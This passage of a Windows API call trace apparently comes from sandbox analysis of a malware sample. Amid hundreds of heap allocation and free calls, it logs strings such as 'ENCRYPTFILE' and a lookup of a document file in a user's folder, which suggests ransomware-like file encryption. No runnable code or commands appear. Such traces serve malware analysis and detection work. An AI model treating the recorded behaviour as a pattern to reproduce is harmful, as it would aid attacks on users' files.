HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0080.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0080.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0080.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0080.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0080.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4314a28 | out: hHeap=0x1780000) returned 1 [0080.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0080.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0080.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0080.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0080.679] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0080.679] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0080.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0080.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0080.679] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0080.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0080.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0080.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0080.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27e0 [0080.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0080.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0080.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0080.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0080.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0080.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0080.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0080.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0080.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431db18 [0080.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0080.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0080.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0080.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0080.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100) returned 0x41817a8 [0080.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431db18 | out: hHeap=0x1780000) returned 1 [0080.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0080.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0080.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0080.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0080.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa90 [0080.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0080.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0080.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0080.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0080.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0080.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0080.680] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0080.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0080.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0080.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0080.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0080.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0080.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0080.680] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0080.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0080.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0080.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0080.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0080.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0080.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0080.681] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\bbYe6GX.rtf", lpFindFileData=0x144e970 | out: lpFindFileData=0x144e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0a74e20, ftCreationTime.dwHighDateTime=0x1d5ecc1, ftLastAccessTime.dwLowDateTime=0xa975cc0, ftLastAccessTime.dwHighDateTime=0x1d5e9b2, ftLastWriteTime.dwLowDateTime=0xa975cc0, ftLastWriteTime.dwHighDateTime=0x1d5e9b2, nFileSizeHigh=0x0, nFileSizeLow=0x7f03, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="bbYe6GX.rtf", cAlternateFileName="")) returned 0x41ac600 [0080.681] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0080.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0080.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0080.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0080.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0080.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0080.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0080.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e00 [0080.681] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0080.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e00 | out: hHeap=0x1780000) returned 1 [0080.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0080.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0080.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27f0 [0080.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0080.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0080.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0080.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0080.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0080.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabc8 [0080.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0080.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0080.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0080.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0080.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0080.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0080.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0080.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0080.682] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0080.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0080.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0080.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0080.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0080.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0080.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0080.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0080.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0080.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918c0 [0080.683] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0080.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43918c0 | out: hHeap=0x1780000) returned 1 [0080.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0080.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0080.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2910 [0080.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0080.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0080.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0080.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0080.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0080.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2740 [0080.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0080.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0080.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0080.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2750 [0080.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0080.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0080.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0080.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab20 [0080.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0080.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0080.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0080.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0080.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0080.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0080.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0080.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0080.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0080.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0080.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0080.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0080.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0080.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0080.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0080.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0080.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0080.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0080.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0080.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0080.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0080.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0080.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0080.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0080.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0080.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0080.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0080.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0080.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0080.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c40 [0080.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0080.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0080.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0080.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0080.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0080.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0080.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0080.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0080.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0080.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0080.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0080.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0080.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0080.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0080.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0080.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0080.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0080.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0080.685] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0080.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0080.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0080.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0080.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0080.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0080.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0080.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0080.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0080.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0080.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0080.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0080.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0080.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0080.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0080.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0080.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0080.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0080.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0080.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0080.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0080.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0080.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0080.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0080.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0080.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0080.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0080.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1e0 [0080.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0080.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0080.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0080.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0080.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0080.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0080.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0080.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0080.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0080.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0080.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb258 [0080.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0080.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0080.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0080.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0080.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0080.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0080.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0080.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0080.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0080.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0080.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0080.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0080.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0080.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0080.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0080.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2e8 [0080.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0080.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0080.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0080.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0080.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2d0 [0080.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0080.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb330 [0080.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0080.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0080.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0080.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0080.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb318 [0080.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0080.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0080.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0080.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4bf0 [0080.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0080.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0080.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0080.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0080.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0080.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb090 [0080.688] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0080.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0080.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0080.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0080.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, 